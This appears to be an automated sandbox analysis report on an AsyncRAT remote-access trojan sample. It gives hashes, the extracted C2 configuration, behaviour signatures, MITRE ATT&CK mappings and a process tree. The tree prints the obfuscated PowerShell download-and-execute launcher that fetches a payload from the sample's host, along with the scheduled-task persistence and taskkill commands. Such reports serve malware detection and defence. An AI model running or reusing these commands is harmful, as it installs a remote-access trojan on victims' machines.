asyncrat | 29ee5ddb52cac1c7be2d68471f62f45c93bcc85d9ac20e27ccc4cacca05e893f

General

Target

RS0517010156Y.bat
Size

8KB
MD5

c395f784569f67d75c18d71bfb456de5
SHA1

6fea746cfd8e1c06633a01358c0e216c9b18408a
SHA256

29ee5ddb52cac1c7be2d68471f62f45c93bcc85d9ac20e27ccc4cacca05e893f
SHA512

10594ccd7e3f3d8fd2d6b36c71dd4b6da4f799407d3a3e6611546861c75ee916342d2d1dc2621b3bf83e3b914952a74cca308a89cc79e9e04d0621106d74167f
SSDEEP

192:lJTXeBTXeoTXe2TXe/TXeqTXeoTXeyTXefTXeoTXeSTXetTXeU1TXevTXeF1TXeV:7X4XRXlXGX/XRXNXWXRXBX2XXXGXsX9K

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Default

C2

superfaster1.is-found.org:5020

Mutex

AsyncMutex_ziad

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4140-155-0x000000000040E61E-mapping.dmp	asyncrat
behavioral2/memory/4140-154-0x0000000000400000-0x0000000000414000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 2128 powershell.exe

flow	pid	process
5	2128	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3984 set thread context of 4140 3984 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4748 schtasks.exe
4688 schtasks.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4732 taskkill.exe
3300 taskkill.exe
1568 taskkill.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings powershell.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2128 powershell.exe
2128 powershell.exe
3984 powershell.exe
3984 powershell.exe

description	pid	process	target process
PID 3984 set thread context of 4140	3984	powershell.exe	aspnet_compiler.exe

pid	process
4748	schtasks.exe
4688	schtasks.exe

pid	process
4732	taskkill.exe
3300	taskkill.exe
1568	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	powershell.exe

pid	process
2128	powershell.exe
2128	powershell.exe
3984	powershell.exe
3984	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exetaskkill.exetaskkill.exetaskkill.exepowershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	4732	taskkill.exe
Token: SeDebugPrivilege	3300	taskkill.exe
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	4140	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

cmd.execmd.exepowershell.exeWScript.execmd.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 3140 wrote to memory of 4020	3140	cmd.exe	cmd.exe
PID 3140 wrote to memory of 4020	3140	cmd.exe	cmd.exe
PID 4020 wrote to memory of 2128	4020	cmd.exe	powershell.exe
PID 4020 wrote to memory of 2128	4020	cmd.exe	powershell.exe
PID 2128 wrote to memory of 4532	2128	powershell.exe	WScript.exe
PID 2128 wrote to memory of 4532	2128	powershell.exe	WScript.exe
PID 4532 wrote to memory of 532	4532	WScript.exe	cmd.exe
PID 4532 wrote to memory of 532	4532	WScript.exe	cmd.exe
PID 532 wrote to memory of 4748	532	cmd.exe	schtasks.exe
PID 532 wrote to memory of 4748	532	cmd.exe	schtasks.exe
PID 532 wrote to memory of 4688	532	cmd.exe	schtasks.exe
PID 532 wrote to memory of 4688	532	cmd.exe	schtasks.exe
PID 532 wrote to memory of 4732	532	cmd.exe	taskkill.exe
PID 532 wrote to memory of 4732	532	cmd.exe	taskkill.exe
PID 532 wrote to memory of 3300	532	cmd.exe	taskkill.exe
PID 532 wrote to memory of 3300	532	cmd.exe	taskkill.exe
PID 532 wrote to memory of 1568	532	cmd.exe	taskkill.exe
PID 532 wrote to memory of 1568	532	cmd.exe	taskkill.exe
PID 3696 wrote to memory of 4916	3696	WScript.exe	cmd.exe
PID 3696 wrote to memory of 4916	3696	WScript.exe	cmd.exe
PID 4916 wrote to memory of 3984	4916	cmd.exe	powershell.exe
PID 4916 wrote to memory of 3984	4916	cmd.exe	powershell.exe
PID 3984 wrote to memory of 4140	3984	powershell.exe	aspnet_compiler.exe
PID 3984 wrote to memory of 4140	3984	powershell.exe	aspnet_compiler.exe
PID 3984 wrote to memory of 4140	3984	powershell.exe	aspnet_compiler.exe
PID 3984 wrote to memory of 4140	3984	powershell.exe	aspnet_compiler.exe
PID 3984 wrote to memory of 4140	3984	powershell.exe	aspnet_compiler.exe
PID 3984 wrote to memory of 4140	3984	powershell.exe	aspnet_compiler.exe
PID 3984 wrote to memory of 4140	3984	powershell.exe	aspnet_compiler.exe
PID 3984 wrote to memory of 4140	3984	powershell.exe	aspnet_compiler.exe
PID 3984 wrote to memory of 932	3984	powershell.exe	schtasks.exe
PID 3984 wrote to memory of 932	3984	powershell.exe	schtasks.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RS0517010156Y.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\system32\cmd.exe
CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$483ED3256B26AAFE56B052813CB9D160B87E1ED2D6118F0E79F13893909EE399DE82C9E3835E6733A01435FE4797E1079FC66DEA9D6E624B48D295D11E213349B63E60A257F0289845DD7C2F6CD92AF147458BD060AD3024E079B9687F1DA44BEB483E39='IEX(NEW-OBJECT NET.W';$146E3F3559E17956489B59DF9BB5DEC966E7FE9D6045F49B54F42ECD43038A45446875144F8CE302D0DD5B9648183C7116B09066FCF2081E95446B91587053F587466DA95998C03446E30D8DD444635E22276631E27461FE38C2B3ECD413A61DE26E650E='EBCLIENT).DOWNLO';[BYTE[]];$D4598255A8441D6D8459B49F8319B4FB20F2A80171DE4E90AA83AB44DB3DB8F09E26796EFD25FBD2E3036520DE4CAFE2DD5F3177BD1879B1486C5D007F94262E3D4D5495BB6B162609CB2D0E626F45E4B5E375A94F71A3C512155918E3A9DBE614D8188B='118604E65D6351D3BF0ED2CDF94E55ABE1F5C8007029472070DEA6A871EB2022FA9D7295564249EE670D696D2D6182E040DB7E9DC2538548F87D8ECDEBADA8D958308A333D129F5795313E064A173F974A110D0483A704D012511C3F31200BBFA13521F0(''http://superfaster1.is-found.org:444/8.png'')'.REPLACE('118604E65D6351D3BF0ED2CDF94E55ABE1F5C8007029472070DEA6A871EB2022FA9D7295564249EE670D696D2D6182E040DB7E9DC2538548F87D8ECDEBADA8D958308A333D129F5795313E064A173F974A110D0483A704D012511C3F31200BBFA13521F0','ADSTRING');[BYTE[]];IEX($483ED3256B26AAFE56B052813CB9D160B87E1ED2D6118F0E79F13893909EE399DE82C9E3835E6733A01435FE4797E1079FC66DEA9D6E624B48D295D11E213349B63E60A257F0289845DD7C2F6CD92AF147458BD060AD3024E079B9687F1DA44BEB483E39+$146E3F3559E17956489B59DF9BB5DEC966E7FE9D6045F49B54F42ECD43038A45446875144F8CE302D0DD5B9648183C7116B09066FCF2081E95446B91587053F587466DA95998C03446E30D8DD444635E22276631E27461FE38C2B3ECD413A61DE26E650E+$D4598255A8441D6D8459B49F8319B4FB20F2A80171DE4E90AA83AB44DB3DB8F09E26796EFD25FBD2E3036520DE4CAFE2DD5F3177BD1879B1486C5D007F94262E3D4D5495BB6B162609CB2D0E626F45E4B5E375A94F71A3C512155918E3A9DBE614D8188B)
2⤵
- Suspicious use of WriteProcessMemory
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$483ED3256B26AAFE56B052813CB9D160B87E1ED2D6118F0E79F13893909EE399DE82C9E3835E6733A01435FE4797E1079FC66DEA9D6E624B48D295D11E213349B63E60A257F0289845DD7C2F6CD92AF147458BD060AD3024E079B9687F1DA44BEB483E39='IEX(NEW-OBJECT NET.W';$146E3F3559E17956489B59DF9BB5DEC966E7FE9D6045F49B54F42ECD43038A45446875144F8CE302D0DD5B9648183C7116B09066FCF2081E95446B91587053F587466DA95998C03446E30D8DD444635E22276631E27461FE38C2B3ECD413A61DE26E650E='EBCLIENT).DOWNLO';[BYTE[]];$D4598255A8441D6D8459B49F8319B4FB20F2A80171DE4E90AA83AB44DB3DB8F09E26796EFD25FBD2E3036520DE4CAFE2DD5F3177BD1879B1486C5D007F94262E3D4D5495BB6B162609CB2D0E626F45E4B5E375A94F71A3C512155918E3A9DBE614D8188B='118604E65D6351D3BF0ED2CDF94E55ABE1F5C8007029472070DEA6A871EB2022FA9D7295564249EE670D696D2D6182E040DB7E9DC2538548F87D8ECDEBADA8D958308A333D129F5795313E064A173F974A110D0483A704D012511C3F31200BBFA13521F0(''http://superfaster1.is-found.org:444/8.png'')'.REPLACE('118604E65D6351D3BF0ED2CDF94E55ABE1F5C8007029472070DEA6A871EB2022FA9D7295564249EE670D696D2D6182E040DB7E9DC2538548F87D8ECDEBADA8D958308A333D129F5795313E064A173F974A110D0483A704D012511C3F31200BBFA13521F0','ADSTRING');[BYTE[]];IEX($483ED3256B26AAFE56B052813CB9D160B87E1ED2D6118F0E79F13893909EE399DE82C9E3835E6733A01435FE4797E1079FC66DEA9D6E624B48D295D11E213349B63E60A257F0289845DD7C2F6CD92AF147458BD060AD3024E079B9687F1DA44BEB483E39+$146E3F3559E17956489B59DF9BB5DEC966E7FE9D6045F49B54F42ECD43038A45446875144F8CE302D0DD5B9648183C7116B09066FCF2081E95446B91587053F587466DA95998C03446E30D8DD444635E22276631E27461FE38C2B3ECD413A61DE26E650E+$D4598255A8441D6D8459B49F8319B4FB20F2A80171DE4E90AA83AB44DB3DB8F09E26796EFD25FBD2E3036520DE4CAFE2DD5F3177BD1879B1486C5D007F94262E3D4D5495BB6B162609CB2D0E626F45E4B5E375A94F71A3C512155918E3A9DBE614D8188B)
3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\document\xx.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\document\xx.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn document /sc minute /mo 5 /tr "C:\ProgramData\document\cdocumentc.vbs"
6⤵
- Creates scheduled task(s)
PID:4748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn det /sc minute /mo 1 /tr "C:\ProgramData\document\cdocumentc.vbs"
6⤵
- Creates scheduled task(s)
PID:4688

C:\Windows\system32\taskkill.exe
taskkill /F /IM schtasks.exe /T
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Windows\system32\taskkill.exe
taskkill /F /IM powershell.exe /T
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3300

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe /T
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\document\cdocumentc.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\document\cdocumentc.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\document\document.PS1
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4140

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn det /f
4⤵
PID:932

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\document\cdocumentc.bat
Filesize
91B

MD5
bc54a5aca6e70c471d1d75d47e5aa188

SHA1
f43c90f0c91fd6f887b1489046732ac2ada6a08d

SHA256
cccdf5334db05073a7a9de4f5a703edeaa306b734e2ecce425d784778402083c

SHA512
f4abd3dbb5b919014c49543612c2b58f097412055e48170922601bb1ddc1a9b2528e2b281c78efbb7d2c21ca4cef219cddc3447ab7046f733df2e29b9353b283

Download Submit
C:\ProgramData\document\cdocumentc.vbs
Filesize
5KB

MD5
5ca1c2e63adbcced60465ec3b40a9a40

SHA1
ce70a35e49b13caf48df8578092d403ab29840b1

SHA256
f2f7d7993a7619a7728b872f6fddf056a8716e407b7e84ca1d73400fb8fa1a51

SHA512
910a55b0c6f7bb85367ec14e2a81671a16c388561e66725d6ad5656a4016bbee167381925e308e87aa3edd757e2843be9a8c5acbe0cee35d82d4f773d1b01674

Download Submit
C:\ProgramData\document\document.PS1
Filesize
215KB

MD5
c621f52564b2e6801d1c7656cd3f53f6

SHA1
cfa86598ef8e471d494c0d3ab2a87679c09d9258

SHA256
0a00ee6a14e98571c844bfd2bb9531f98aafedfb9681d8e96cd8195e842b174d

SHA512
378493c0951470b5a9eb0932de40db5b4274c08468e6a5448c03ff8261f785e3665cdf8b128d1c0061e1b82d2a55ebe099dec883b27a9ba7daeba8385aa752d7

Download Submit
C:\ProgramData\document\xx.bat
Filesize
285B

MD5
21a3b2f4680df5c2f7dff113aa5860d3

SHA1
c94869555a499789945a4a5f46422170920d02f7

SHA256
516460223222fe39c1fff5f7afffa0bd72f2115fc9c4e7888038cca22bf3171d

SHA512
fbe6de24603fa93e3e7983cdff0e25306ba1f05aec666b54476e5b1dffffd153e48123255557d6dac077cac1f5282a22f9e91c07cbbb34a622d0f4d3c10f1b9c

Download Submit
C:\ProgramData\document\xx.vbs
Filesize
4KB

MD5
7f73f88c5668d2b399390dc1c63092ee

SHA1
ed2e083983f7c5f80eb65b5bb0786bc749d3c4ad

SHA256
df5e360d4aee892f037726c021e2817521a28a1b595e12ea89d00c557c9fc4ff

SHA512
1514c5b5751b2ace7241a8764ea01e81a797a2f6f34036c7fc65dd0c7b26efef92c7bc8ef1193d6c7678ae9fd740ba77b378ed1e02c52d9f0f0bd7ac19d71391

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
41d515d5c13eee8dac49179444a89124

SHA1
15381e59e572585c54d3cc5e3f061131e5d98673

SHA256
767db2d9cc84af3c573adfc4345b42c646091926fc42eb106d1fe7cfb976b49b

SHA512
f1caab2d5acc7ef9a41685788c009a6bb7af1423c20fd652ab858ec64405a6158a6de0e9ee09c519d44317197864c56620556ddba9e967b926095b1e45795c43

Download Submit
memory/532-140-0x0000000000000000-mapping.dmp

Download
memory/932-156-0x0000000000000000-mapping.dmp

Download
memory/1568-145-0x0000000000000000-mapping.dmp

Download
memory/2128-135-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp

Filesize
10.8MB

Download
memory/2128-134-0x0000024DCC2B0000-0x0000024DCC2D2000-memory.dmp

Filesize
136KB

Download
memory/2128-138-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp

Filesize
10.8MB

Download
memory/2128-133-0x0000000000000000-mapping.dmp

Download
memory/3300-144-0x0000000000000000-mapping.dmp

Download
memory/3984-157-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp

Filesize
10.8MB

Download
memory/3984-149-0x0000000000000000-mapping.dmp

Download
memory/3984-153-0x00007FFFDEF20000-0x00007FFFDF9E1000-memory.dmp

Filesize
10.8MB

Download
memory/4020-132-0x0000000000000000-mapping.dmp

Download
memory/4140-158-0x0000000005CB0000-0x0000000005D4C000-memory.dmp

Filesize
624KB

Download
memory/4140-160-0x0000000005DC0000-0x0000000005E26000-memory.dmp

Filesize
408KB

Download
memory/4140-159-0x0000000006300000-0x00000000068A4000-memory.dmp

Filesize
5.6MB

Download
memory/4140-155-0x000000000040E61E-mapping.dmp

Download
memory/4140-154-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4532-136-0x0000000000000000-mapping.dmp

Download
memory/4688-142-0x0000000000000000-mapping.dmp

Download
memory/4732-143-0x0000000000000000-mapping.dmp

Download
memory/4748-141-0x0000000000000000-mapping.dmp

Download
memory/4916-148-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads